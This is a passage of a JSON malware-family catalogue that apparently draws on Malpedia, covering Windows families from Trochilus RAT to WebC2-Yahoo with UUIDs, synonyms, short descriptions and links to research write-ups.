[], "type": [] }, "uuid": "1c3ee140-8c47-4aa7-9723-334ccd886c4e", "value": "Trochilus RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.troldesh", "https://securelist.com/the-shade-encryptor-a-double-threat/72087/", "https://www.welivesecurity.com/2019/01/28/russia-hit-new-wave-ransomware-spam/", "https://isc.sans.edu/forums/diary/More+Russian+language+malspam+pushing+Shade+Troldesh+ransomware/24668/", "https://blogs.technet.microsoft.com/mmpc/2016/07/13/troldesh-ransomware-influenced-by-the-da-vinci-code/", "https://support.kaspersky.com/13059" ], "synonyms": [ "Shade" ], "type": [] }, "uuid": "41acd50d-e602-41a9-85e7-c091fb4bc126", "value": "Troldesh" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.trump_ransom" ], "synonyms": [], "type": [] }, "uuid": "48deadcc-1a67-442d-b181-fdaaa337c4bb", "value": "Trump Ransom" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tsifiri" ], "synonyms": [], "type": [] }, "uuid": "3da6f62c-9e06-4e7b-8852-7c7689f65833", "value": "Tsifiri" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.turnedup", "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html", "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage" ], "synonyms": [], "type": [] }, "uuid": "fab34d66-5668-460a-bc0f-250b9417cdbf", "value": "TURNEDUP" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tyupkin", "https://www.lastline.com/labsblog/tyupkin-atm-malware/" ], "synonyms": [], "type": [] }, "uuid": "c28e9055-b656-4b7a-aa91-fe478a83fe4c", "value": "Tyupkin" }, { "description": "A toolkit maintained by hfiref0x which incorporates numerous UAC bypass techniques for Windows 7 - Windows 10. Typically, components of this tool are stripped out and reused by malicious actors.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.uacme", "https://github.com/hfiref0x/UACME" ], "synonyms": [ "Akagi" ], "type": [] }, "uuid": "ccde5b0d-fe13-48e6-a6f4-4e434ce29371", "value": "UACMe" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.udpos", "https://threatmatrix.cylance.com/en_us/home/threat-spotlight-inside-udpos-malware.html", "https://blogs.forcepoint.com/security-labs/udpos-exfiltrating-credit-card-data-dns" ], "synonyms": [], "type": [] }, "uuid": "5d05d81d-a0f8-496d-9a80-9b04fe3019fc", "value": "UDPoS" }, { "description": "Information stealer.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ufrstealer", "https://twitter.com/malwrhunterteam/status/1096363455769202688", "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Usteal" ], "synonyms": [ "Usteal" ], "type": [] }, "uuid": "a24bf6d9-e177-44f2-9e61-8cf3566e45eb", "value": "UFR Stealer" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.uiwix", "https://www.minerva-labs.com/post/uiwix-evasive-ransomware-exploiting-eternalblue" ], "synonyms": [], "type": [] }, "uuid": "5e362cd1-bc5c-4225-b820-00ec7ebebadd", "value": "Uiwix" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_001" ], "synonyms": [], "type": [] }, "uuid": "72961adc-ace1-4593-99f1-266119ddeccb", "value": "Unidentified 001" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_003" ], "synonyms": [], "type": [] }, "uuid": "0e435b5d-37df-47cc-a1c4-1afb82df83d1", "value": "Unidentified 003" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_005" ], "synonyms": [], "type": [] }, "uuid": "29e32ea9-8e10-4c50-a4dc-1642066a3df2", "value": "win.unidentified_005" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_006" ], "synonyms": [], "type": [] }, "uuid": "c0a40d42-33bb-4eca-8121-f636aeec14c6", "value": "Unidentified 006" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_013_korean_malware", "http://blog.talosintelligence.com/2017/02/korean-maldoc.html" ], "synonyms": [], "type": [] }, "uuid": "b1cc4c79-30a5-485d-bd7f-8625c1cb5956", "value": "Unidentified 013 (Korean)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_020_cia_vault7", "https://wikileaks.org/ciav7p1/cms/page_34308128.html" ], "synonyms": [], "type": [] }, "uuid": "40c66571-164c-4050-9c84-f37c9cd84055", "value": "Unidentified 020 (Vault7)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_022_ransom" ], "synonyms": [], "type": [] }, "uuid": "5424d89e-1b7a-4632-987b-67fd27621d6f", "value": "Unidentified 022 (Ransom)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_023" ], "synonyms": [], "type": [] }, "uuid": "a936a595-f03d-4d8c-848e-2a3525c0415b", "value": "Unidentified 023" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_024_ransom", "https://twitter.com/malwrhunterteam/status/789161704106127360" ], "synonyms": [], "type": [] }, "uuid": "acf6c476-847c-477a-b640-18a5c99e3c2b", "value": "Unidentified 024 (Ransomware)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_025_clickfraud", "http://malware-traffic-analysis.net/2016/05/09/index.html" ], "synonyms": [], "type": [] }, "uuid": "f43a0e38-2394-4538-a123-4a0457096058", "value": "Unidentified 025 (Clickfraud)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_028" ], "synonyms": [], "type": [] }, "uuid": "22a686d8-dd35-4a29-9437-b0ce7b5c204b", "value": "Unidentified 028" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_029" ], "synonyms": [], "type": [] }, "uuid": "aff47054-7130-48ca-aa2c-247bdf44f180", "value": "Unidentified 029" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_030", "https://twitter.com/JaromirHorejsi/status/877811773826641920" ], "synonyms": [], "type": [] }, "uuid": "7287a0b0-b943-4007-952f-07b9475ec184", "value": "Filecoder" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_031" ], "synonyms": [], "type": [] }, "uuid": "122c1c9c-3131-4014-856c-7e8a0da57a6e", "value": "Unidentified 031" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_032", "https://researchcenter.paloaltonetworks.com/2017/08/unit42-blockbuster-saga-continues/" ], "synonyms": [], "type": [] }, "uuid": "799921d7-48e8-47a6-989e-487b527af37a", "value": "Unidentified 032" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_035" ], "synonyms": [], "type": [] }, "uuid": "ba014661-d1d4-4a69-a698-9f4120de9260", "value": "Unidentified 035" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_037" ], "synonyms": [], "type": [] }, "uuid": "d073f9e5-8aa8-4e66-ba47-f332759199a2", "value": "Unidentified 037" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_038" ], "synonyms": [], "type": [] }, "uuid": "d53e96c5-abfa-4be4-bb33-0a898c5aff58", "value": "Unidentified 038" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_039" ], "synonyms": [], "type": [] }, "uuid": "97c1524a-c052-49d1-8770-14b513d8a830", "value": "Unidentified 039" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_041" ], "synonyms": [], "type": [] }, "uuid": "88d70171-fc89-44d1-8931-035c0b095247", "value": "Unidentified 041" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_042", "http://www.intezer.com/lazarus-group-targets-more-cryptocurrency-exchanges-and-fintech-companies/" ], "synonyms": [], "type": [] }, "uuid": "168bf2a1-45a5-41ac-b364-5740e7ce9757", "value": "Unidentified 042" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_044" ], "synonyms": [], "type": [] }, "uuid": "df9c8440-b4da-4226-b982-e510d06cf246", "value": "Unidentified 044" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_045" ], "synonyms": [], "type": [] }, "uuid": "4cb8235a-7e70-4fad-9244-69215750d559", "value": "Unidentified 045" }, { "description": "RAT written in Delphi used by Patchwork APT.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_047", "https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/" ], "synonyms": [], "type": [] }, "uuid": "18da6a0e-abe9-4f65-91a3-2bf5a5ad29c2", "value": "Unidentified 047" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_049", "https://www.welivesecurity.com/2017/02/16/demystifying-targeted-malware-used-polish-banks/" ], "synonyms": [], "type": [] }, "uuid": "abd22cec-49ee-431f-a2e6-e4722b3e44bb", "value": "Unidentified 049 (Lazarus/RAT)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_051", "https://twitter.com/CDA/status/1014144988454772736" ], "synonyms": [], "type": [] }, "uuid": "b614f291-dbf8-49ed-b110-b69ab6e8c6e5", "value": "Unidentified 051" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_052" ], "synonyms": [], "type": [] }, "uuid": "80c12fcd-e5ef-4549-860d-7928363022f9", "value": "Unidentified 052" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_053", "https://labsblog.f-secure.com/2015/11/24/wonknu-a-spy-for-the-3rd-asean-us-summit/" ], "synonyms": [], "type": [] }, "uuid": "b60e32bd-158a-42b9-ac21-288bca4c8233", "value": "Unidentified 053 (Wonknu?)" }, { "description": "Unnamed downloader for win.wscspl as described in the 360ti blog post.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_055", "https://www.freebuf.com/articles/database/192726.html", "https://ti.360.net/blog/articles/analysis-of-targeted-attack-against-pakistan-by-exploiting-inpage-vulnerability-and-related-apt-groups-english" ], "synonyms": [], "type": [] }, "uuid": "b001ebb7-5d33-4972-96cc-56f9549dff27", "value": "Unidentified 055" }, { "description": "Unnamed portscanner as used in the Australian Parliament Hack (Feb 2019).", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_057", "https://blog.yoroi.company/research/the-arsenal-behind-the-australian-parliament-hack/" ], "synonyms": [], "type": [] }, "uuid": "1b8e86ab-57b2-4cd9-a768-a7118b4eb4be", "value": "Unidentified 057" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_058", "https://securelist.com/the-evolution-of-brazilian-malware/74325/#rat", "https://securelist.com/the-return-of-the-bom/90065/" ], "synonyms": [], "type": [] }, "uuid": "bab52335-be9e-4fad-b68e-f124b0d69bbc", "value": "Unidentified 058" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unlock92", "https://twitter.com/struppigel/status/810753660737073153", "https://twitter.com/bartblaze/status/976188821078462465" ], "synonyms": [], "type": [] }, "uuid": "036e657f-a752-4a4c-bb30-f15c24d954e6", "value": "Unlock92" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.upas", "https://malware.dontneedcoffee.com/2012/08/inside-upas-kit1.0.1.1.html", "https://twitter.com/ulexec/status/1005096227741020160", "https://research.checkpoint.com/deep-dive-upas-kit-vs-kronos/" ], "synonyms": [ "Rombrast" ], "type": [] }, "uuid": "b64ea39b-3ec2-49e3-8992-02d71c21b1bd", "value": "UPAS" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.upatre", "https://johannesbader.ch/2015/06/Win32-Upatre-BI-Part-1-Unpacking/", "https://researchcenter.paloaltonetworks.com/2018/07/unit42-upatre-continues-evolve-new-anti-analysis-techniques/", "https://secrary.com/ReversingMalware/Upatre/" ], "synonyms": [], "type": [] }, "uuid": "925390a6-f88d-46dc-96ae-4ebc9f0b50b0", "value": "Upatre" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.urausy" ], "synonyms": [], "type": [] }, "uuid": "5af4838f-1b4d-4f0b-bd27-50ef532e84f7", "value": "Urausy" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.urlzone", "https://www.gdatasoftware.com/blog/2013/12/23978-bebloh-a-well-known-banking-trojan-with-noteworthy-innovations", "https://www.johannesbader.ch/2015/01/the-dga-of-shiotob/", "https://www.proofpoint.com/us/threat-insight/post/Vawtrak-UrlZone-Banking-Trojans-Target-Japan", "https://www.fireeye.com/blog/threat-research/2016/01/urlzone_zones_inon.html", "https://www.arbornetworks.com/blog/asert/an-update-on-the-urlzone-banker/", "https://www.cybereason.com/blog/new-ursnif-variant-targets-japan-packed-with-new-features", "https://www.crowdstrike.com/blog/cutwail-spam-campaign-uses-steganography-to-distribute-urlzone/", "https://www.virusbulletin.com/virusbulletin/2012/09/urlzone-reloaded-new-evolution/", "http://blog.inquest.net/blog/2019/03/09/Analyzing-Sophisticated-PowerShell-Targeting-Japan/", "https://krebsonsecurity.com/2011/07/trojan-tricks-victims-into-transfering-funds/" ], "synonyms": [ "Bebloh", "Shiotob" ], "type": [] }, "uuid": "ed9f995b-1b41-4b83-a978-d956670fdfbe", "value": "UrlZone" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.uroburos", "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/november/turla-png-dropper-is-back/", "https://www.gdatasoftware.com/blog/2014/05/23958-uroburos-rootkit-belgian-foreign-ministry-stricken", "https://www.gdatasoftware.com/blog/2014/03/23966-uroburos-deeper-travel-into-kernel-protection-mitigation", "https://www.circl.lu/pub/tr-25/", "https://www.gdatasoftware.com/blog/2014/11/23937-the-uroburos-case-new-sophisticated-rat-identified", "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3193&sid=9fe4a57263c91a8b18bc43ae23afc453", "https://www.gdatasoftware.com/blog/2014/10/23941-com-object-hijacking-the-discreet-way-of-persistence", "https://www.gdatasoftware.com/blog/2014/02/23968-uroburos-highly-complex-espionage-software-with-russian-roots", "https://www.gdatasoftware.com/blog/2014/06/23953-analysis-of-uroburos-using-windbg", "https://www.carbonblack.com/2017/08/18/threat-analysis-carbon-black-threat-research-dissects-png-dropper/" ], "synonyms": [ "Snake" ], "type": [] }, "uuid": "d674ffd2-1f27-403b-8fe9-b4af6e303e5c", "value": "Uroburos (Windows)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.vawtrak", "https://www.blueliv.com/downloads/network-insights-into-vawtrak-v2.pdf", "https://info.phishlabs.com/blog/the-unrelenting-evolution-of-vawtrak", "https://threatpost.com/pos-attacks-net-crooks-20-million-stolen-bank-cards/117595/", "http://thehackernews.com/2017/01/neverquest-fbi-hacker.html", "https://blog.fox-it.com/2018/08/09/bokbot-the-rebirth-of-a-banker/", "https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/" ], "synonyms": [ "Catch", "NeverQuest", "grabnew" ], "type": [] }, "uuid": "b662c253-5c87-4ae6-a30e-541db0845f67", "value": "Vawtrak" }, { "description": "Delphi-based ransomware.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.vegalocker", "https://twitter.com/malwrhunterteam/status/1095024267459284992", "https://twitter.com/malwrhunterteam/status/1093136163836174339" ], "synonyms": [ "Vega" ], "type": [] }, "uuid": "704bb00f-f558-4568-824c-847523700043", "value": "VegaLocker" }, { "description": "Ransomware that appears to require manually installation (believed to be via RDP). Encrypts files with .velso extension. ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.velso", "https://www.bleepingcomputer.com/news/security/the-velso-ransomware-being-manually-installed-by-attackers/" ], "synonyms": [], "type": [] }, "uuid": "5490d2c7-72db-42cf-a1a4-02be1b3ade5f", "value": "Velso Ransomware" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.venus_locker", "https://twitter.com/JaromirHorejsi/status/813690129088937984" ], "synonyms": [], "type": [] }, "uuid": "7a0137ad-df7a-4fae-8365-eb36cc7e60cd", "value": "Venus Locker" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.vermin", "https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/", "https://www.welivesecurity.com/2018/07/17/deep-dive-vermin-rathole/", "https://www.fireeye.com/blog/threat-research/2019/04/spear-phishing-campaign-targets-ukraine-government.html" ], "synonyms": [], "type": [] }, "uuid": "2d07a1bf-1d8d-4f1e-a02f-1a8ff5b76cd1", "value": "Vermin" }, { "description": "Vflooder floods VirusTotal by infinitely submitting a copy of itself. Some variants apparently also try to flood Twitter. The impact on these services are negligible, but for researchers it can be a nuisance. Most versions are protectd by VMProtect.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.vflooder", "https://blog.malwarebytes.com/threat-analysis/2017/10/analyzing-malware-by-api-calls/" ], "synonyms": [], "type": [] }, "uuid": "044849d3-d0de-4f78-b67d-bfbe8dd3a255", "value": "Vflooder" }, { "description": "Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar", "https://www.bleepingcomputer.com/news/security/gandcrab-operators-use-vidar-infostealer-as-a-forerunner/", "https://tccontre.blogspot.com/2019/03/infor-stealer-vidar-trojanspy-analysis.html", "https://fumik0.com/2018/12/24/lets-dig-into-vidar-an-arkei-copycat-forked-stealer-in-depth-analysis/" ], "synonyms": [], "type": [] }, "uuid": "1f44c08a-b427-4496-9d6d-909b6bf34b9b", "value": "vidar" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.virdetdoor", "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks" ], "synonyms": [], "type": [] }, "uuid": "30161733-993f-4a1c-bcc5-7b4f1cd7d9e4", "value": "virdetdoor" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.virut", "https://krebsonsecurity.com/2013/01/polish-takedown-targets-virut-botnet/", "https://chrisdietri.ch/post/virut-resurrects/", "https://www.secureworks.com/research/virut-encryption-analysis", "https://blog.malwarebytes.com/threat-analysis/2018/03/blast-from-the-past-stowaway-virut-delivered-with-chinese-ddos-bot/", "https://www.theregister.co.uk/2018/01/10/taiwanese_police_malware/", "https://www.spamhaus.org/news/article/690/cooperative-efforts-to-shut-down-virut-botnet", "https://securelist.com/review-of-the-virus-win32-virut-ce-malware-sample/36305/" ], "synonyms": [], "type": [] }, "uuid": "2e99f27c-6791-4695-b88b-de4d4cbda8d6", "value": "Virut" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.vmzeus", "https://blog.malwarebytes.com/threat-analysis/2014/02/hiding-in-plain-sight-a-story-about-a-sneaky-banking-trojan/", "https://securityintelligence.com/new-zberp-trojan-discovered-zeus-zbot-carberp/", "https://asert.arbornetworks.com/wp-content/uploads/2015/08/ZeusVM_Bits_and_Pieces.pdf" ], "synonyms": [ "VMzeus", "Zberp", "ZeusVM" ], "type": [] }, "uuid": "c32740a4-db2c-4d71-80bd-7377185f4a6f", "value": "VM Zeus" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.vobfus", "http://contagiodump.blogspot.com/2012/12/nov-2012-worm-vobfus-samples.html", "https://blog.trendmicro.com/trendlabs-security-intelligence/whats-the-fuss-with-worm_vobfus/" ], "synonyms": [], "type": [] }, "uuid": "60f7b1b9-c283-4395-909f-7b8b1731e840", "value": "Vobfus" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.volgmer", "https://www.us-cert.gov/ncas/alerts/TA17-318B", "https://securelist.com/operation-applejeus/87553/" ], "synonyms": [ "FALLCHILL", "Manuscrypt" ], "type": [] }, "uuid": "bbfd4fb4-3e5a-43bf-b4bb-eaf5ef4fb25f", "value": "Volgmer" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.vreikstadi", "https://twitter.com/malware_traffic/status/821483557990318080" ], "synonyms": [], "type": [] }, "uuid": "ab2a63f1-1afd-44e7-9cf4-c775dbee78f4", "value": "Vreikstadi" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.vskimmer", "http://www.xylibox.com/2013/01/vskimmer.html", "http://vkremez.weebly.com/cyber-security/-backdoor-win32hesetoxa-vskimmer-pos-malware-analysis", "https://securingtomorrow.mcafee.com/mcafee-labs/vskimmer-botnet-targets-credit-card-payment-terminals/" ], "synonyms": [], "type": [] }, "uuid": "3eae1764-7ea6-43e6-85a1-b1dd0b4856b8", "value": "vSkimmer" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.w32times", "https://attack.mitre.org/wiki/Group/G0022" ], "synonyms": [], "type": [] }, "uuid": "2479b6b9-c818-4f96-aba4-47ed7855e4a8", "value": "w32times" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.wallyshack", "https://blog.malwarebytes.com/threat-analysis/2019/02/new-golang-brute-forcer-discovered-amid-rise-e-commerce-attacks/" ], "synonyms": [], "type": [] }, "uuid": "0bd92907-c858-4164-87d6-fec0f3595e69", "value": "WallyShack" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.wannacryptor", "https://blog.avast.com/ransomware-that-infected-telefonica-and-nhs-hospitals-is-spreading-aggressively-with-over-50000-attacks-so-far-today", "https://baesystemsai.blogspot.de/2017/05/wanacrypt0r-ransomworm.html", "http://www.independent.co.uk/news/uk/home-news/wannacry-malware-hack-nhs-report-cybercrime-north-korea-uk-ben-wallace-a8022491.html", "https://gist.github.com/rain-1/989428fa5504f378b993ee6efbc0b168", "https://blog.comae.io/wannacry-new-variants-detected-b8908fefea7e", "https://blog.comae.io/wannacry-the-largest-ransom-ware-infection-in-history-f37da8e30a58", "https://themoscowtimes.com/news/wcry-virus-reportedly-infects-russian-interior-ministrys-computer-network-57984", "https://krebsonsecurity.com/2017/05/u-k-hospitals-hit-in-widespread-ransomware-attack/", "https://securelist.com/blog/incidents/78351/wannacry-ransomware-used-in-widespread-attacks-all-over-the-world/", "https://www.malwaretech.com/2017/05/how-to-accidentally-stop-a-global-cyber-attacks.html", "https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group", "https://blog.gdatasoftware.com/2017/05/29751-wannacry-ransomware-campaign", "https://blog.malwarebytes.com/cybercrime/2017/05/how-did-wannacry-ransomworm-spread/", "https://www.flashpoint-intel.com/blog/linguistic-analysis-wannacry-ransomware/", "http://blog.emsisoft.com/2017/05/12/wcry-ransomware-outbreak/", "https://blog.comae.io/wannacry-decrypting-files-with-wanakiwi-demo-86bafb81112d" ], "synonyms": [ "Wana Decrypt0r", "WannaCry", "Wcry" ], "type": [] }, "uuid": "ad67ff31-2a02-43f9-8b12-7df7e4fcccd6", "value": "WannaCryptor" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.waterminer", "https://blog.minerva-labs.com/waterminer-a-new-evasive-crypto-miner" ], "synonyms": [], "type": [] }, "uuid": "d536931e-ad4f-485a-b93d-fe05f23a9367", "value": "WaterMiner" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.waterspout", "https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html" ], "synonyms": [], "type": [] }, "uuid": "d238262a-4832-408f-9926-a7174e671b50", "value": "WaterSpout" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_adspace", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "e57c677f-0117-4e23-8c3f-a772ed809f4c", "value": "WebC2-AdSpace" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_ausov", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "64f5ae85-1324-43de-ba3a-063785567be0", "value": "WebC2-Ausov" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_bolid", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "71292a08-9a7b-4df1-b1fd-7d80a8fcc18f", "value": "WebC2-Bolid" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_cson", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "5371bc44-dc07-4992-a3d7-c21705c50ac4", "value": "WebC2-Cson" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_div", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "acdda3e5-e776-419b-b060-14f3406de061", "value": "WebC2-DIV" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_greencat", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "cfed10ed-6601-469e-a1df-2d561b031244", "value": "WebC2-GreenCat" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_head", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "f9f37707-36cf-4ad0-88e0-86f47cbe0ed6", "value": "WebC2-Head" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_kt3", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "15094548-7555-43ee-8c0d-4557d6d8a087", "value": "WebC2-Kt3" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_qbp", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "71d8ef43-3767-494b-afaa-f58aad70df65", "value": "WebC2-Qbp" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_rave", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "5350bf3a-26b0-49fb-a0b8-dd68933ea78c", "value": "WebC2-Rave" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_table", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "1035ea6f-6743-4e69-861c-454c19ec96ae", "value": "WebC2-Table" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_ugx", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "b459033c-2d19-49aa-a21f-44a01d1a4156", "value": "WebC2-UGX" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_yahoo", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "52c1518d-175c-4b39-bc7c-353d2ddf382e", "value": "WebC2-Yahoo" }, { "description": "On its website, Webmonitor RAT is described as 'a very powerful, user-friendly, easy-to-setup 